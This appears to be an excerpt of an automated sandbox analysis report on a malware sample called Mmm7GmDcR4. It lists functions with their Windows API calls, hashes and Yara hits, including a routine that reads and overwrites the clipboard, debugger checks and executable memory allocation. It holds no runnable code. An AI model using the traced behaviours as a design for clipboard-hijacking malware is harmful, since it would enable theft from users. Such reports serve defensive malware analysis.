                                                                                                • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                • Instruction Fuzzy Hash: 2511487590420AAFCF05DF58E94199B7BF4FF48314F10406AF808AB311D770EA11CBA9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                • Instruction ID: 35ea3ad1aa6a7a88a67b465f5c451a9d93fb5bd3893c922deb476a376b6bfb46
                                                                                                • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                • Instruction Fuzzy Hash: 3EF0BE33810008BBCF115E96DC01DDF3B6EEF8D339F100116F914921A0DB3ACA22ABA4
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                • Instruction ID: eec6a97fd20e662809c0c25a02e68f43ccf4a0d84c2e20558320e6cd2c3c69d0
                                                                                                • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                • Instruction Fuzzy Hash: 6CE0E5213006207FDA303F675C06B5B36489F49BBAF142137AC06927D1DB2CEE0085ED
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004103B7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw
                                                                                                • String ID:
                                                                                                • API String ID: 2005118841-0
                                                                                                • Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                                                • Instruction ID: 7514a9331385c8c8780a364a21f4f069850cbfc0a8d6a65b648f56ba84841e90
                                                                                                • Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                                                • Instruction Fuzzy Hash: 75E02B3050020DB3CB147665FC1185D777C5A10318BA04237BC28A14D1DF78E59DC48D
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 005A04B6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770031470.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5a0000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction ID: afbe89e0e87623a0dec53ffbd6e47046583ca4f53e6d3c76f9f980e700bdc4cb
                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction Fuzzy Hash: AC112A79A40208EFDB01DF98C985E98BFF5AB09750F058094FA489B362D371EA50DB80
                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0213194D
                                                                                                • Sleep.KERNEL32(00001541,0000004C), ref: 02131957
                                                                                                  • Part of subcall function 0213CE6D: _strlen.LIBCMT ref: 0213CE84
                                                                                                • OpenClipboard.USER32(00000000), ref: 02131984
                                                                                                • GetClipboardData.USER32(00000001), ref: 02131994
                                                                                                • _strlen.LIBCMT ref: 021319B0
                                                                                                • _strlen.LIBCMT ref: 021319DF
                                                                                                • _strlen.LIBCMT ref: 02131B23
                                                                                                • EmptyClipboard.USER32 ref: 02131B39
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 02131B46
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 02131B70
                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 02131B79
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 02131B80
                                                                                                • CloseClipboard.USER32 ref: 02131BA4
                                                                                                • Sleep.KERNEL32(000002D2), ref: 02131BAF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                • String ID: 4#E$i
                                                                                                • API String ID: 4246938166-2480119546
                                                                                                • Opcode ID: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                                                • Instruction ID: 3d1e7c7c205478150ca06e1a83bf64749cff4840caa7450bf0700ee8621e91ce
                                                                                                • Opcode Fuzzy Hash: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                                                • Instruction Fuzzy Hash: 1C512431C40784EEE3229FA8DC457FC7B75FF2A306F045225D805A6162EB709B85CBA9
                                                                                                APIs
                                                                                                • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 02132392
                                                                                                • GetClientRect.USER32(?,?), ref: 021323A7
                                                                                                • GetDC.USER32(?), ref: 021323AE
                                                                                                • CreateSolidBrush.GDI32(00646464), ref: 021323C1
                                                                                                • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021323E0
                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 02132401
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0213240C
                                                                                                • MulDiv.KERNEL32(00000008,00000000), ref: 02132415
                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02132439
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 021324C4
                                                                                                • _wcslen.LIBCMT ref: 021324DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 1529870607-0
                                                                                                • Opcode ID: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                                                • Instruction ID: 75b0c8bc05ef991941053c067080c680668a0e0cac7f573aa794ba5f6f9d1084
                                                                                                • Opcode Fuzzy Hash: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                                                • Instruction Fuzzy Hash: 9C71EC72910228AFDB229F64DD85FAEB7BDEF09711F4042A5B509E6155DA70AF80CF10
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: __floor_pentium4
                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                • API String ID: 4168288129-2761157908
                                                                                                • Opcode ID: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                                                • Instruction ID: eb952a9da5ee3ca1a054b410db7a12ab4ba9b877121e99a49e25e720736a14a4
                                                                                                • Opcode Fuzzy Hash: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                                                • Instruction Fuzzy Hash: 1EC25B71E096288FDB25CE29DD407EAB7B5EB48304F1451EBD84DE7280E778AE818F45
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0216BCE4,?,00000000), ref: 0216BA5E
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0216BCE4,?,00000000), ref: 0216BA87
                                                                                                • GetACP.KERNEL32(?,?,0216BCE4,?,00000000), ref: 0216BA9C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                • Instruction ID: dc4379c11546ca7e0c876948d799cfe586faf6d3d003a6dbe50ed3732784f732
                                                                                                • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                • Instruction Fuzzy Hash: CF21AF26688105AAD7348F55D909BBF73A6EB40E6DB578464E90AF7210FB33DF60C350
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
                                                                                                • GetACP.KERNEL32(?,?,0043BA7D,?,00000000), ref: 0043B835
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                • Instruction ID: 1b44de1f7026d878333f9870d974062101081d782898e535d61b674f6735b06a
                                                                                                • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                • Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8
                                                                                                APIs
                                                                                                  • Part of subcall function 02162131: GetLastError.KERNEL32(?,?,0215A9DC,?,00000000,?,0215CDD6,02132474,00000000,?,00451F20), ref: 02162135
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162168
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621A9
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162190
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0216219D
                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0216BCA5
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0216BD00
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0216BD0F
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,02160A0C,00000040,?,02160B2C,00000055,00000000,?,?,00000055,00000000), ref: 0216BD57
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,02160A8C,00000040), ref: 0216BD76
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                • String ID:
                                                                                                • API String ID: 2287132625-0
                                                                                                • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                • Instruction ID: 9d1f9b4e2a919ad268c809c412d5618d7111e42f972749a250cd92e8df1abdd3
                                                                                                • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                • Instruction Fuzzy Hash: D2519171A44209AFDB20EFA5CC48ABE77BAFF14708F054429E910F7150EB719B21CBA1
                                                                                                APIs
                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA3E
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0043BA99
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAA8
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                • String ID:
                                                                                                • API String ID: 2287132625-0
                                                                                                • Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                • Instruction ID: e5497ab5c31cc8eb6cce8c5579f1d7db95bd29b644ec7623244df27cb8a16c00
                                                                                                • Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                • Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9
                                                                                                APIs
                                                                                                  • Part of subcall function 02162131: GetLastError.KERNEL32(?,?,0215A9DC,?,00000000,?,0215CDD6,02132474,00000000,?,00451F20), ref: 02162135
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162168
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621A9
                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02160A13,?,?,?,?,0216046A,?,00000004), ref: 0216B343
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0216B3D3
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0216B3E1
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02160A13,00000000,02160B33), ref: 0216B484
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                • String ID:
                                                                                                • API String ID: 2444527052-0
                                                                                                • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                • Instruction ID: d9eb2b43566c8fb9d12dd9e7cfcf8a7b3a8f51e738b2909652c6d1e5755d4849
                                                                                                • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                • Instruction Fuzzy Hash: 0B61E871A88206AED724AF74CC49BBF73ADEF04719F14443AE915E7580E774E620CBA0
                                                                                                APIs
                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307AC,?,?,?,?,00430203,?,00000004), ref: 0043B0DC
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0043B16C
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0043B17A
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307AC,00000000,004308CC), ref: 0043B21D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                • String ID:
                                                                                                • API String ID: 2444527052-0
                                                                                                • Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                • Instruction ID: 0696757347486699991afdae1c367ad9a815ca2b39bc809b388401715a4d6b3e
                                                                                                • Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                • Instruction Fuzzy Hash: D1611871600206AADB24AB75DC46BBB73A8EF0D340F14146FFA15D7281EB7CE95087E9
                                                                                                APIs
                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B439
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B48A
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B54A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorInfoLastLocale$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2834031935-0
                                                                                                • Opcode ID: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
                                                                                                • Instruction ID: f1e76511527bd8b46bed2dc81967877e1a53036e4ad42a1ad25ba8e4a7fcb861
                                                                                                • Opcode Fuzzy Hash: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
                                                                                                • Instruction Fuzzy Hash: 2461A571500207ABEF289F25CC82BBA77A8EF08318F10507BEE15C6681E73DD951CB99
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0213DACD), ref: 0215A722
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0213DACD), ref: 0215A72C
                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0213DACD), ref: 0215A739
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                • Instruction ID: a0e593438b0fb8666bf4aa55a54e826865c9fdff2601ed4d868b12aa8a09b5d1
                                                                                                • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                • Instruction Fuzzy Hash: 4D31C77494122CDBCB21DF64DD8879CB7B8BF08710F5042EAE81CA7250EB359B858F48
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4BB
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4C5
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                                                • Instruction ID: 026f9f506817a9816d6037b847677398505f2b74d93b69b13e61bf99ecfd2c2c
                                                                                                • Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                                                • Instruction Fuzzy Hash: BC31D8749012289BCB21DF24D9887CDBBB4AF08711F5041EAE81CA7250EB749F958F49
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,0216008C,00000000,00457970,0000000C,021601E3,00000000,00000002,00000000), ref: 021600D7
                                                                                                • TerminateProcess.KERNEL32(00000000,?,0216008C,00000000,00457970,0000000C,021601E3,00000000,00000002,00000000), ref: 021600DE
                                                                                                • ExitProcess.KERNEL32 ref: 021600F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                • Instruction ID: 7ea9bdb30f44c98512376cde79aafdf0311faf5fbdec4309ca240bacc5c91a54
                                                                                                • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                • Instruction Fuzzy Hash: 42E0B635040648AFCF116F64DD0CA6D7B6AFB49B86F404024FA059B121CB36DE62CA84
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE70
                                                                                                • TerminateProcess.KERNEL32(00000000,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE77
                                                                                                • ExitProcess.KERNEL32 ref: 0042FE89
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                • Instruction ID: cbe936bc43631a6ebab221667e08f429fe6a913ec22d428f2decb57a07c45d03
                                                                                                • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                • Instruction Fuzzy Hash: F9E08C31100548AFCF126F60ED09A5A3B39FF11B86F850479F8068B276CB39EE42CB48
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .$GetProcAddress.$l
                                                                                                • API String ID: 0-2784972518
                                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                • Instruction ID: 3836c2c0c9d7d0588d79a54d7fb2a89bb352c49fe921cc1f55db2b8726cc0980
                                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                • Instruction Fuzzy Hash: 51314CB6940609DFDB11CF99C880AAEBBF6FF48324F15404AD445AB310D771EA45CFA4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: /
                                                                                                • API String ID: 0-2043925204
                                                                                                • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                • Instruction ID: ea693af245e7920ef13d033c699aea956a366aa61959c7578c1f71dff1f5c8cd
                                                                                                • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                • Instruction Fuzzy Hash: 8A412272940218AFCB249FB9CC8CEBF77B9EF80714F1042A9E91597180E7319E95CB60
                                                                                                Strings
